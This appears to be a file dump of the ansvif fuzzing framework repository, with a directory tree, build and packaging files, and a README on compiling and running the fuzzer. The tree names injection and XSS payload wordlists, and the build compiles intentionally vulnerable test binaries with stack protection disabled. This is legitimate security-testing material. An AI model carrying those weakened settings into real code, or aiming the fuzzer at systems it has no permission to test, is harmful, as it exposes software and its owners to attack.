├── .externalToolBuilders ├── aclocal.launch ├── autoconf.launch ├── automake.launch ├── configure.launch └── make.launch ├── .gitignore ├── .project ├── Dockerfile ├── LICENSE ├── Makefile.am ├── README.md ├── ansvif.i64 ├── bin ├── debs │ ├── .gitkeep │ ├── ansvif_1.11_amd64 │ │ ├── DEBIAN │ │ │ └── control │ │ ├── share │ │ │ └── man │ │ │ │ └── man1 │ │ │ │ ├── .gitkeep │ │ │ │ ├── ansvif.1.gz │ │ │ │ ├── ansvif_gtk.1.gz │ │ │ │ └── find_suid.1.gz │ │ └── usr │ │ │ └── bin │ │ │ └── .gitkeep │ └── ansvif_1.8_i386 │ │ ├── DEBIAN │ │ └── control │ │ ├── share │ │ └── man │ │ │ └── man1 │ │ │ ├── ansvif.1.gz │ │ │ └── find_suid.1.gz │ │ └── usr │ │ └── bin │ │ └── .gitkeep ├── rpms │ ├── .gitkeep │ └── ansvif.spec └── win │ ├── ansvif.bat │ └── metadata.rc ├── configure.ac ├── examples ├── all ├── biglist ├── nasty │ ├── Command-Injection-commix.txt │ ├── DB2Enumeration.fuzzdb.txt │ ├── FORMATSTRING-JHADDIX.txt │ ├── FuzzingStrings-SkullSecurity.org.txt │ ├── Generic-BlindSQLi.fuzzdb.txt │ ├── Generic-SQLi.txt │ ├── HTML5sec-Injections-JHADDIX.txt │ ├── JSON.Fuzzing.txt │ ├── LDAP.Fuzzinging.txt │ ├── LFI-JHADDIX.txt │ ├── MSSQL-Enumeration.fuzzdb.txt │ ├── MSSQL.fuzzdb.txt │ ├── MYSQL.fuzzdb.txt │ ├── Metacharacters.fuzzdb.txt │ ├── MySQL-Read-Local-Files.fuzzdb.txt │ ├── MySQL-SQLi-Login-Bypass.fuzzdb.txt │ ├── NoSQL.txt │ ├── Oracle.fuzzdb.txt │ ├── Polyglots │ │ ├── SQLi-Polyglots.txt │ │ ├── XSS-Polyglot-Ultimate-0xsobky.txt │ │ ├── XSS-Polyglots-Dmiessler.txt │ │ └── XSS-Polyglots.txt │ ├── Postgres-Enumeration.fuzzdb.txt │ ├── SSI-Injection-JHADDIX.txt │ ├── URI-XSS.fuzzdb.txt │ ├── UnixAttacks.fuzzdb.txt │ ├── UserAgents-IE.txt │ ├── UserAgents.fuzz.txt │ ├── Windows-Attacks.fuzzdb.txt │ ├── XML-FUZZ.txt │ ├── XSS-BYPASS-STRINGS-BRUTELOGIC.txt │ ├── XSS-BruteLogic.txt │ ├── XSS-JHADDIX.txt │ ├── XSS-RSNAKE.txt │ ├── XSS-Vectors-Mario.txt │ ├── XSS-WITH-CONTEXT-JHADDIX.txt │ ├── XXE-Fuzzing.txt │ ├── alphanum-case-extra.txt │ ├── alphanum-case.txt │ ├── 
big-list-of-naughty-strings.txt │ ├── char.txt │ ├── doble-uri-hex.txt │ ├── extension-test.txt │ ├── lol │ ├── numeric-fields-only.txt │ ├── special-chars.txt │ ├── unicode.txt │ ├── uri-hex.txt │ └── useragents-ie.txt └── specific │ ├── blank.txt │ ├── chrome_t.txt │ ├── flag_chars.txt │ ├── htmltags.txt │ ├── http.txt │ ├── linux_syscalls.list │ ├── linux_syscalls_implemented.list │ ├── math.txt │ ├── mogrify_t.txt │ ├── mount_e.txt │ ├── mount_o.txt │ ├── mount_t.txt │ ├── networking.txt │ ├── sample.gif │ ├── sample.mkv │ ├── snap-confine_e.txt │ ├── snap-profile │ ├── space.txt │ ├── sudo.txt │ └── test-win.txt ├── icons ├── icon.ico └── icon.jpg ├── include ├── gzstream │ ├── .deps │ │ └── .dirstamp │ ├── .dirstamp │ ├── .gitignore │ ├── COPYING.LIB │ ├── Makefile │ ├── README │ ├── gzstream.cpp │ ├── gzstream.h │ ├── index.html │ ├── logo.gif │ └── version ├── md5.h ├── stack.h └── xmlwriter │ └── xml_writer.hpp ├── make_win.bat ├── man ├── ansvif.1.gz ├── ansvif_gtk.1.gz └── find_suid.1.gz ├── src ├── .deps │ └── .dirstamp ├── .dirstamp ├── bin2hex.cpp ├── buffer_overflow.c ├── file_check.cpp ├── generic_buffer_overflow.c ├── gtk.cpp ├── help.cpp ├── linux │ ├── .deps │ │ └── .dirstamp │ ├── .dirstamp │ └── syscalls.cpp ├── log.cpp ├── main.cpp ├── man_read.cpp ├── match_fault.cpp ├── null_pointer.c ├── oxagast.cpp ├── popen2.cpp ├── randomizer.cpp ├── reaper.cpp ├── remove_chars.cpp ├── string_format.c ├── sys_string.cpp ├── templates.cpp ├── to_int.cpp ├── trash.cpp ├── version.h ├── win │ └── printf.c └── write_file.cpp ├── tmp └── .gitkeep └── tools ├── bermise_fuzz.sh └── find_suid.sh /.externalToolBuilders/aclocal.launch: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /.externalToolBuilders/autoconf.launch: -------------------------------------------------------------------------------- 1 | 2 | 3 
| 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /.externalToolBuilders/automake.launch: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /.externalToolBuilders/configure.launch: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | -------------------------------------------------------------------------------- /.externalToolBuilders/make.launch: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | *.l[ao] 2 | *~ 3 | *.o 4 | *.a 5 | *.exe 6 | *.swp 7 | metadata.res 8 | ansvif 9 | faulty 10 | find_suid 11 | syscalls 12 | ansvif_gtk 13 | null_pointer 14 | string_format 15 | generic_buffer_overflow 16 | configure 17 | *.log 18 | !/man/* 19 | !/tmp/* 20 | /tmp/1 21 | !/bin/rpms/ansvif.spec 22 | !/bin/debs/ansvif_*/DEBIAN 23 | !/bin/debs/ansvif_*/DEBIAN/control 24 | !/bin/debs/ansvif_*/usr/share/man/man1/*gz 25 | compile 26 | install-sh 27 | depcomp 28 | missing 29 | src/.clang-format 30 | src/linux/.clang-format 31 | src/win/.clang-format 32 | config.guess 33 | config.sub 34 | test-driver 35 | /autom4te.cache/ 36 | *.Po 37 | Makefile 38 | Makefile.in 39 | config.log 40 | config.status 41 | aclocal.m4 42 | -------------------------------------------------------------------------------- /.project: -------------------------------------------------------------------------------- 1 | 2 | 3 | Code_ansvif 4 | 5 | 6 | 7 | 8 | 9 | org.eclipse.ui.externaltools.ExternalToolBuilder 10 | full,incremental, 11 | 12 | 13 | LaunchConfigHandle 14 | 
<project>/.externalToolBuilders/aclocal.launch 15 | 16 | 17 | 18 | 19 | org.eclipse.ui.externaltools.ExternalToolBuilder 20 | full,incremental, 21 | 22 | 23 | LaunchConfigHandle 24 | <project>/.externalToolBuilders/autoconf.launch 25 | 26 | 27 | 28 | 29 | org.eclipse.ui.externaltools.ExternalToolBuilder 30 | full,incremental, 31 | 32 | 33 | LaunchConfigHandle 34 | <project>/.externalToolBuilders/automake.launch 35 | 36 | 37 | 38 | 39 | org.eclipse.ui.externaltools.ExternalToolBuilder 40 | full,incremental, 41 | 42 | 43 | LaunchConfigHandle 44 | <project>/.externalToolBuilders/configure.launch 45 | 46 | 47 | 48 | 49 | org.eclipse.ui.externaltools.ExternalToolBuilder 50 | full,incremental, 51 | 52 | 53 | LaunchConfigHandle 54 | <project>/.externalToolBuilders/make.launch 55 | 56 | 57 | 58 | 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:16.04 2 | 3 | WORKDIR /src 4 | 5 | RUN apt update && apt-get --no-install-recommends -yqq install \ 6 | ca-certificates \ 7 | git \ 8 | automake \ 9 | autoconf-archive \ 10 | zlib1g-dev \ 11 | g++ \ 12 | libgcc-4.8-dev \ 13 | gcc \ 14 | gtk2.0 15 | 16 | RUN git clone https://github.com/oxagast/ansvif.git 17 | WORKDIR ansvif 18 | RUN aclocal 19 | RUN autoconf 20 | RUN automake -a 21 | RUN ./configure --disable-gtk 22 | RUN make 23 | 24 | 25 | CMD ./ansvif -t examples/specific/flag_chars.txt -c ./generic_buffer_overflow -b 64 -z -L root 26 | -------------------------------------------------------------------------------- /Makefile.am: -------------------------------------------------------------------------------- 1 | AUTOMAKE_OPTIONS = foreign 2 | ACLOCAL_AMFLAGS = ${ACLOCAL_FLAGS} 3 | if WITH_GTK 4 | bin_PROGRAMS = ansvif ansvif_gtk generic_buffer_overflow string_format null_pointer 5 | endif 6 | if WITH_SYSCALLS 7 | bin_PROGRAMS = ansvif syscalls 8 | endif 9 | if 
WITH_TESTCODE 10 | bin_PROGRAMS = ansvif generic_buffer_overflow string_format null_pointer 11 | else 12 | bin_PROGRAMS = ansvif 13 | endif 14 | noinst_LIBRARIES = libgzstream.a 15 | libgzstream_a_SOURCES = include/gzstream/gzstream.h include/gzstream/gzstream.cpp 16 | if OS_IS_KALI 17 | SUBDIRS = include/gzstream/ 18 | endif 19 | ansvif_SOURCES = src/log.cpp src/bin2hex.cpp src/popen2.cpp src/main.cpp src/help.cpp src/match_fault.cpp src/sys_string.cpp src/man_read.cpp src/trash.cpp src/randomizer.cpp src/remove_chars.cpp src/to_int.cpp src/file_check.cpp src/reaper.cpp src/write_file.cpp src/templates.cpp src/oxagast.cpp src/version.h include/gzstream/gzstream.h include/xmlwriter/xml_writer.hpp include/stack.h 20 | if OS_IS_REDHAT 21 | ansvif_LDADD = -lgzstream -lstdc++ -lpthread -lz -L. 22 | ansvif_LDFLAGS = -I./include/gzstream -I./include/xml_writer -I./src/linux 23 | ansvif_CPPFLAGS = -O3 -D __REDHAT__ -D __NOTANDROID__ -Wall -std=c++11 -ftemplate-depth=1024 24 | endif 25 | if OS_IS_DEBIAN 26 | ansvif_LDADD = -lgzstream -lstdc++ -lpthread -lz -L. 27 | ansvif_LDFLAGS = -I./include/gzstream -I./include/xml_writer -I./src/linux 28 | ansvif_CPPFLAGS = -O3 -D __DEBIAN__ -D __NOTANDROID__ -Wall -std=c++11 -ftemplate-depth=1024 29 | endif 30 | if OS_IS_ARCH 31 | ansvif_LDADD = -lgzstream -lstdc++ -lpthread -lz -L. 32 | ansvif_LDFLAGS = -I./include/gzstream -I./include/xml_writer -I./src/linux 33 | ansvif_CPPFLAGS = -O3 -D __ARCH__ -D __NOTANDROID__ -Wall -std=c++11 -ftemplate-depth=1024 34 | endif 35 | if OS_IS_FREEBSD 36 | ansvif_LDADD = -lstdc++ -lz -L. 37 | ansvif_LDFLAGS = -I./include/gzstream -I./include/xml_writer -I./src/linux -pthread 38 | ansvif_CPPFLAGS = -O3 -D __DEBIAN__ -D __FREEBSD__ -D __NOTANDROID__ -Wl,--no-as-needed -std=c++11 -ftemplate-depth=1024 39 | endif 40 | if OS_IS_KALI 41 | ansvif_LDADD = -lgzstream -lstdc++ -lpthread -lz -L. 
42 | ansvif_LDFLAGS = -I./include/gzstream -I./include/xml_writer -I./src/linux 43 | ansvif_CPPFLAGS = -O3 -D __KALI__ -D __DEBIAN__ -D __NOTANDROID__ -Wall -std=c++11 -ftemplate-depth=1024 44 | endif 45 | if WITH_TESTCODE 46 | generic_buffer_overflow_SOURCES = src/generic_buffer_overflow.c 47 | generic_buffer_overflow_CFLAGS = -ansi -fno-stack-protector -D_GNU_SOURCE -Wno-implicit-function-declaration 48 | string_format_SOURCES = src/string_format.c 49 | string_format_CFLAGS = -ansi -D_GNU_SOURCE -Wno-format-security 50 | null_pointer_SOURCES = src/null_pointer.c 51 | endif 52 | if WITH_SYSCALLS 53 | syscalls_SOURCES = src/linux/syscalls.cpp 54 | syscalls_CPPFLAGS = -ansi -Wno-unused-result -Wno-nonnull -std=c++11 55 | endif 56 | if WITH_GTK 57 | ansvif_gtk_SOURCES = src/gtk.cpp src/popen2.cpp src/file_check.cpp 58 | ansvif_gtk_LDADD = @GTK_LIBS@ 59 | ansvif_gtk_CPPFLAGS = @GTK_CFLAGS@ -D __NOTANDROID__ 60 | endif 61 | ansvifdir = bin 62 | check: all 63 | ./ansvif -t examples/specific/space.txt -c ./generic_buffer_overflow -b 64 -o checkfaulty && rm checkfaulty.* 64 | @echo "*** CHECK 1 PASSED ***" 65 | ./ansvif -t examples/specific/space.txt -c ./generic_buffer_overflow -b 64 66 | @echo "*** CHECK 2 PASSED ***" 67 | ./ansvif -t examples/specific/space.txt -c ./string_format -b 32 68 | @echo "*** CHECK 3 PASSED ***" 69 | @echo "*** ALL TESTS PASSED ***" 70 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ansvif 2 | *A Not So Very Intelligent Fuzzer* 3 | 4 | Marshall Whittaker 5 | 6 | oxagast 7 | 8 | marshallwhittaker@gmail.com 9 | 10 | *As the complexity of a system rises, as does the potential for problems within that system.* 11 | 12 | *--Whittaker's Law* 13 | 14 | 15 | **Compile Dependancies:** 16 | 17 | automake autoconf-archive zlib1g-dev g++ gcc (and libgtk2.0-dev if you want GTK support) 18 | 19 | **Compliation:** 20 | 21 | 
*Linux:* 22 | ``` 23 | $ aclocal && autoconf && automake -a && ./configure && make && make check 24 | ``` 25 | Or, if you would like to play with the syscall fuzzer: 26 | ``` 27 | $ aclocal && autoconf && automake -a && ./configure --enable-syscalls && make && make check 28 | ``` 29 | If you would like to disable the GTK frontend you can do: 30 | ``` 31 | $ aclocal && autoconf && automake -a && ./configure --disable-gtk && make && make check 32 | ``` 33 | *FreeBSD* 34 | 35 | Assuming you installed g++ from ports (as you will need to for C++11): 36 | 37 | ``` 38 | $ aclocal && autoconf && automake -a && ./configure && make && make check 39 | ``` 40 | 41 | *OpenBSD:* 42 | 43 | Assuming you installed g++ from ports (as you will need to for C++11): 44 | 45 | ``` 46 | $ CXX=$(find / -name 'eg++' 2>/dev/null | grep ports | head -n 1) AUTOCONF_VERSION=2.69 AUTOMAKE_VERSION=1.15 autoreconf -fmi 47 | ``` 48 | *Windows:* 49 | 50 | Windows binaries are now designed to be compiled with MinGW-W64 (since we use threading, download 51 | a version of MinGW-W64 g++ with seh). 52 | You can try compiling after installing MinGW-W64 g++ with seh (only) by clicking on the included make_win.bat script. If that fails, it is likely due to the environment, so try the below. 53 | 54 | (Go to where you installed MinGW-W64 and click mingw-64.bat) 55 | 56 | ``` 57 | windres metadata.rc -O coff -o metadata.res 58 | g++.exe src/common.cpp src/bin2hex.cpp src/popen2.cpp src/main.cpp src/help.cpp src/match_fault.cpp src/sys_string.cpp src/man_read.cpp src/randomizer.cpp src/trash.cpp src/log.cpp metadata.res src/version.h -I./ -I./include -std=c++11 -lstdc++ -lpthread -O2 -o ansvif.exe -static -static-libgcc -static-libstdc++ 59 | gcc src/win/printf.c -o printf.exe 60 | ``` 61 | 62 | 63 | Note: cygwin .dll external files are no longer required as we now compile with g++ from MinGW. 64 | In Windows 7, Powershell v2 is installed by default; however, this program requires at least 65 | Powershell v5. 
Windows 10 includes Powershell v5. You can go to Microsoft's site and download 66 | the Windows Management Framework (which includes newer versions of Powershell) here: 67 | 68 | https://www.microsoft.com/en-us/download/details.aspx?id=50395 69 | 70 | **Testing:** 71 | 72 | If you would like to try out the example code, you can compile faulty.c with: 73 | ``` 74 | $ gcc faulty.c -o faulty 75 | ``` 76 | You can also simply run `make check`. 77 | 78 | **Usage:** 79 | 80 | *Important note: Windows users will have to run ansvif.exe from Powershell for it to work!* 81 | 82 | ``` 83 | $ ./find_suid /usr/bin/ /bin/ /sbin/ 84 | $ ./ansvif -[tm] [template/manpage] -c /path/to/executable -b buffersize 85 | ``` 86 | **Examples:** 87 | 88 | *Linux/BSD:* 89 | ``` 90 | $ ulimit -c unlimited 91 | $ ./ansvif -m mount -c /bin/mount -e examples/mount_e.txt -x examples/mount_o.txt\ 92 | -f 8 -b 2048 93 | $ ./ansvif -t examples/blank.txt -F tmp/tmphtml -x examples/htmltags.txt -c /usr/bin/iceweasel -b\ 94 | 128 -A "file:///home/username/src/ansvif/tmp/tmphtml" -f 2 -n -R "sleep 3 && killall\ 95 | iceweasel" -S ">" 96 | $ cat examples/linux_syscalls_implemented.list | xargs -P \ 97 | `cat examples/linux_syscalls_implemented.list | wc -l` -I {calls} ./ansvif -t examples/space.txt \ 98 | -B "{calls} " -c ./syscalls -o syscall_crash -f 1 -z -d -b 16 99 | ``` 100 | 101 | *Windows:* 102 | ``` 103 | PS C:\ansvif\bin\ansvif_win> .\ansvif -t ..\..\examples\space -F ..\..\tmp\tmphtml -x ` 104 | ..\..\examples\htmltags -c ` 105 | 'C:\Program Files (x86)\Google\Chrome\Application\chrome.exe' ` 106 | -b 128 -A "file:///C:\\Users\marsh\OneDrive\Documents\Code\ansvif\tmp\tmphtml" ` 107 | -f 2 -n -S ">" -R "sleep 2 ; Stop-Process -Name chrome" 108 | ``` 109 | 110 | **Options:** 111 | 112 | ansvif 113 | 114 | ``` 115 | -t This file should hold line by line command arguments as shown in the example file. 
116 | -e This file should hold line by line environment variables as shown in the example 117 | file. You can usually get these by doing something like: 118 | $ strings /bin/mount | perl -ne 'print if /[A-Z]=$/' > mount_envs 119 | -c Specifies the command path. 120 | -p Specifies the manpage location (as an integer, usually 1 or 8) 121 | -m Specifies the command's manpage. 122 | -D Dumps what's found in the manpage. 123 | -f Number of threads to use. Default is 2. 124 | -b Specifies the buffer size to fuzz with. 256-2048 is usually sufficient. 125 | -r Uses only random garbage data. 126 | -o Writes output to log file. 127 | -z Randomize the buffer size from 1 to what is specified by -b. 128 | -x Other junk to put in. Usernames and such can go here. 129 | -S Separator between options. 130 | -s Omitted character specification. Defaults are <>\\n |&\[]\()\{}:;\ and newline is mandatory. 131 | -T Timeout for threads. 132 | -W Timeout for threads. 133 | -L Unprivileged user to run as, if root. 134 | -A Always put what's after this after the command to run. 135 | -B Always put what's after this before the command to run. 136 | -F File to feed into the program that -x along with normal fuzzing data will be put in. 137 | -n Never use random data in the fuzz. 138 | -R Run this command after each fuzz. 139 | -C A non-standard error code to detect. 140 | -V Use Valgrind if installed. 141 | -1 Try to make it fault once; if it doesn't happen, throw error code 64. Useful for scripting. 142 | -P Use % to represent binary in fuzz. 143 | -M Max arguments to use in the fuzz. 144 | -y Short for -b 0 and usually only useful with -A or -B. 145 | -K Keep fuzzing after a crash in the target. 146 | -E A command to be run before the fuzzed program. 147 | -0 No NULL characters in the fuzz. 148 | -N Shorthand for -R "pkill prog". 149 | -v Verbose. 150 | -d Debug data. 151 | -h Shows the help page. 152 | -i Prints version information. 
153 | ``` 154 | ansvif_gtk 155 | 156 | ``` 157 | -l Shortcut for -p ./ansvif 158 | -p The location of the ansvif binary 159 | ``` 160 | 161 | **Recommendations:** 162 | It is recommended that if you are doing long fuzzes or file fuzzing, if possible 163 | put the files (including the binary you are fuzzing if possible) in memory. 164 | This means, put them somewhere like /var/run/shm where disk thrash will be 165 | minimal, and fuzzing will be somewhat faster, especially if large files are being 166 | handled. Be warned however: You will lose your fuzzed files if they are in shm 167 | and you reboot the machine! 168 | 169 | **DO NOT RUN THIS CODE IN A PRODUCTION ENVIRONMENT!** 170 | If you try making faulty.c's compiled output setuid root (suid 0), then *PLEASE* do it in a virtual machine, 171 | or at least on a machine that you don't care about. 172 | Other than that, just play around and have fun! 173 | 174 | 175 | **Notes:** 176 | 177 | Windows users must have ansvif running from Powershell. 178 | Linux and Windows code should be relatively stable. 179 | Syscall fuzzing under Linux is under heavy development. 180 | 181 | 182 | **Thanks** 183 | 184 | Thanks to dll999 for syscall fuzzing ideas. 185 | Thanks to moo from #2600 on 2600net for a few recommendations on the wiki writeup. 186 | Thanks to god knows how many people on IRC and StackOverflow. 187 | Thanks to DarkSt0rm for fixing a bug in the Makefile. 
188 | -------------------------------------------------------------------------------- /ansvif.i64: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/ansvif.i64 -------------------------------------------------------------------------------- /bin/debs/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/debs/.gitkeep -------------------------------------------------------------------------------- /bin/debs/ansvif_1.11_amd64/DEBIAN/control: -------------------------------------------------------------------------------- 1 | Package: ansvif 2 | Version: 1.11 3 | Section: base 4 | Priority: optional 5 | Architecture: amd64 6 | Depends: zlib1g, libgtk2.0-0 7 | Recommends: gcc, g++, gdb 8 | Suggests: valgrind 9 | Maintainer: Marshall Whittaker 10 | Description: fuzzes other programs for bugs 11 | A Not So Very Intelligent Fuzzer 12 | ansvif is a tool designed to help researchers find code vulnerabilities and bugs. 
13 | -------------------------------------------------------------------------------- /bin/debs/ansvif_1.11_amd64/share/man/man1/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/debs/ansvif_1.11_amd64/share/man/man1/.gitkeep -------------------------------------------------------------------------------- /bin/debs/ansvif_1.11_amd64/share/man/man1/ansvif.1.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/debs/ansvif_1.11_amd64/share/man/man1/ansvif.1.gz -------------------------------------------------------------------------------- /bin/debs/ansvif_1.11_amd64/share/man/man1/ansvif_gtk.1.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/debs/ansvif_1.11_amd64/share/man/man1/ansvif_gtk.1.gz -------------------------------------------------------------------------------- /bin/debs/ansvif_1.11_amd64/share/man/man1/find_suid.1.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/debs/ansvif_1.11_amd64/share/man/man1/find_suid.1.gz -------------------------------------------------------------------------------- /bin/debs/ansvif_1.11_amd64/usr/bin/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/debs/ansvif_1.11_amd64/usr/bin/.gitkeep -------------------------------------------------------------------------------- /bin/debs/ansvif_1.8_i386/DEBIAN/control: 
-------------------------------------------------------------------------------- 1 | Package: ansvif 2 | Version: 1.6-1 3 | Section: base 4 | Priority: optional 5 | Architecture: i386 6 | Depends: zlib1g 7 | Recommends: gcc, g++, gdb 8 | Suggests: valgrind 9 | Maintainer: Marshall Whittaker 10 | Description: fuzzes other programs for bugs 11 | A Not So Very Intelligent Fuzzer 12 | ansvif is a tool designed to help researchers find code vulnerabilities and bugs. 13 | -------------------------------------------------------------------------------- /bin/debs/ansvif_1.8_i386/share/man/man1/ansvif.1.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/debs/ansvif_1.8_i386/share/man/man1/ansvif.1.gz -------------------------------------------------------------------------------- /bin/debs/ansvif_1.8_i386/share/man/man1/find_suid.1.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/debs/ansvif_1.8_i386/share/man/man1/find_suid.1.gz -------------------------------------------------------------------------------- /bin/debs/ansvif_1.8_i386/usr/bin/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/debs/ansvif_1.8_i386/usr/bin/.gitkeep -------------------------------------------------------------------------------- /bin/rpms/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/bin/rpms/.gitkeep -------------------------------------------------------------------------------- /bin/rpms/ansvif.spec: 
-------------------------------------------------------------------------------- 1 | Name: ansvif 2 | Version: 1.9.1 3 | Release: 1%{?dist} 4 | Summary: A Not So Very Intelligent Fuzzer 5 | 6 | License: GPLv2 7 | URL: http://oxagast.github.io/ansvif 8 | Source0: %{name}-%{version}.tar.gz 9 | 10 | BuildRequires: gcc automake autoconf zlib-devel cryptopp-devel 11 | Requires: gcc 12 | 13 | %description 14 | A Not So Very Intelligent Fuzzer: An advanced cross platform featureful fuzzing framework designed to find vulnerabilities in C/C++ code. 15 | 16 | %prep 17 | %autosetup 18 | 19 | 20 | %build 21 | aclocal && autoconf && automake -a 22 | %configure 23 | %make_build 24 | 25 | %install 26 | rm -rf $RPM_BUILD_ROOT 27 | mkdir -p %{buildroot}/%{_mandir}/man1 28 | cp man/*gz %{buildroot}/%{_mandir}/man1 29 | mkdir -p %{buildroot}/%{_bindir} 30 | cp tools/find_suid.sh %{buildroot}/usr/bin/find_suid 31 | mkdir -p %{buildroot}/usr/share/ansvif/examples 32 | cp examples/all examples/specific examples/biglist %{buildroot}/usr/share/ansvif/examples -r 33 | %make_install 34 | 35 | 36 | %define _unpackaged_files_terminate_build 0 37 | %files 38 | %license LICENSE 39 | %{_mandir}/man1/ansvif.1.gz 40 | %{_mandir}/man1/find_suid.1.gz 41 | %{_bindir}/ansvif 42 | %{_bindir}/find_suid 43 | %{_bindir}/ansvif_gtk 44 | /usr/share/ansvif/examples/biglist 45 | /usr/share/ansvif/examples/all 46 | /usr/share/ansvif/examples/specific/ 47 | 48 | %changelog 49 | * Tue Apr 17 2018 Marshall Lee Whittaker 50 | - 51 | -------------------------------------------------------------------------------- /bin/win/ansvif.bat: -------------------------------------------------------------------------------- 1 | powershell.exe -noexit -command "& '.\ansvif' -h" -------------------------------------------------------------------------------- /bin/win/metadata.rc: -------------------------------------------------------------------------------- 1 | id ICON "icons\\icon.ico" 2 | 1 VERSIONINFO 3 | FILEVERSION 
1,8,1,1 4 | PRODUCTVERSION 1,0,0,0 5 | BEGIN 6 | BLOCK "StringFileInfo" 7 | BEGIN 8 | BLOCK "080904E4" 9 | BEGIN 10 | VALUE "CompanyName", "oxagast" 11 | VALUE "FileDescription", "ansvif" 12 | VALUE "FileVersion", "1.8.1" 13 | VALUE "InternalName", "ansvif" 14 | VALUE "LegalCopyright", "GPL2" 15 | VALUE "OriginalFilename", "ansvif.exe" 16 | VALUE "ProductName", "A Not So Very Intelligent Fuzzer" 17 | VALUE "ProductVersion", "1" 18 | END 19 | END 20 | BLOCK "VarFileInfo" 21 | BEGIN 22 | VALUE "Translation", 0x809, 1252 23 | END 24 | END -------------------------------------------------------------------------------- /configure.ac: -------------------------------------------------------------------------------- 1 | AC_INIT([ansvif], [1.11], [marshallwhittaker@gmail.com], [], [https://oxagast.github.io/ansvif]) 2 | AC_PROG_CC 3 | AC_PROG_CXX 4 | AC_LANG([C++]) 5 | AC_TYPE_SIZE_T 6 | AC_PROG_RANLIB 7 | #AC_CONFIG_HEADERS([include/gzstream/gzstream.h]) 8 | AC_HEADER_STDC 9 | #AX_CXX_COMPILE_STDCXX_11([noext],[mandatory]) 10 | AX_CXX_COMPILE_STDCXX_11 11 | AC_CHECK_HEADERS([string]) 12 | AC_CHECK_HEADERS([ipstream]) 13 | AC_CHECK_HEADERS(zlib.h) 14 | #AC_CHECK_HEADERS([lz]) 15 | #AC_SEARCH_LIBS(z) 16 | #AC_CHECK_HEADERS([crypto]) 17 | AC_CHECK_LIB(pthread, pthread_create, have_pthread=yes) 18 | AC_CONFIG_FILES([Makefile]) 19 | AM_INIT_AUTOMAKE([subdir-objects]) 20 | # This adds the option of compiling without using the ctemplate library, 21 | # which has proved troublesome for compilation on some platforms 22 | AC_ARG_ENABLE(syscalls, 23 | [ --enable-syscalls Enable Syscalls compiliation (experimental)], 24 | [case "${enableval}" in 25 | yes) WITH_SYSCALLS=true ;; 26 | no) WITH_SYSCALLS=false ;; 27 | *) AC_MSG_ERROR(bad value ${enableval} for --enable-syscalls) ;; 28 | esac],[WITH_SYSCALLS=false]) 29 | AM_CONDITIONAL([WITH_SYSCALLS], [test "$WITH_SYSCALLS" = "true"]) 30 | # try to compile syscalls if they're enabled 31 | if test "$WITH_SYSCALLS" = "true"; then 32 | 
AC_DEFINE([WITH_SYSCALLS], [], ["build syscalls module"]) 33 | AC_MSG_NOTICE([syscalls enabled, we will try to compile them]) 34 | else 35 | AC_MSG_NOTICE([syscalls module is disabled]) 36 | fi 37 | 38 | AC_ARG_ENABLE(gtk, 39 | [ --disable-gtk Enable GTK compiliation (experimental)], 40 | [case "${enableval}" in 41 | yes) WITH_GTK=true ;; 42 | no) WITH_GTK=false ;; 43 | *) AC_MSG_ERROR(bad value ${enableval} for --disable-gtk) ;; 44 | esac],[WITH_GTK=true]) 45 | AM_CONDITIONAL([WITH_GTK], [test "$WITH_GTK" = "true"]) 46 | # try to compile syscalls if they're enabled 47 | if test "$WITH_GTK" = "false"; then 48 | AC_MSG_NOTICE([GTK module is disabled]) 49 | else 50 | AC_DEFINE([WITH_GTK], [], ["build GTK module"]) 51 | AC_MSG_NOTICE([GTK enabled, we will try to compile them]) 52 | PKG_CHECK_MODULES(GTK, [gtk+-2.0]) 53 | # PKG_CHECK_MODULES([gtk+-2.0]) 54 | fi 55 | 56 | AC_ARG_ENABLE(testcode, 57 | [ --disable-testcode Disable Test Code)], 58 | [case "${enableval}" in 59 | yes) WITH_TESTCODE=true ;; 60 | no) WITH_TESTCODE=false ;; 61 | *) AC_MSG_ERROR(bad value ${enableval} for --disable-testcode) ;; 62 | esac],[WITH_TESTCODE=true]) 63 | AM_CONDITIONAL([WITH_TESTCODE], [test "$WITH_TESTCODE" = "true"]) 64 | if test "$WITH_TESTCODE" = "false"; then 65 | AC_MSG_NOTICE([Test Code is disabled]) 66 | else 67 | AC_DEFINE([WITH_TESTCODE], [], ["build Test Code"]) 68 | AC_MSG_NOTICE([Test Code, we will try to compile them]) 69 | fi 70 | 71 | 72 | 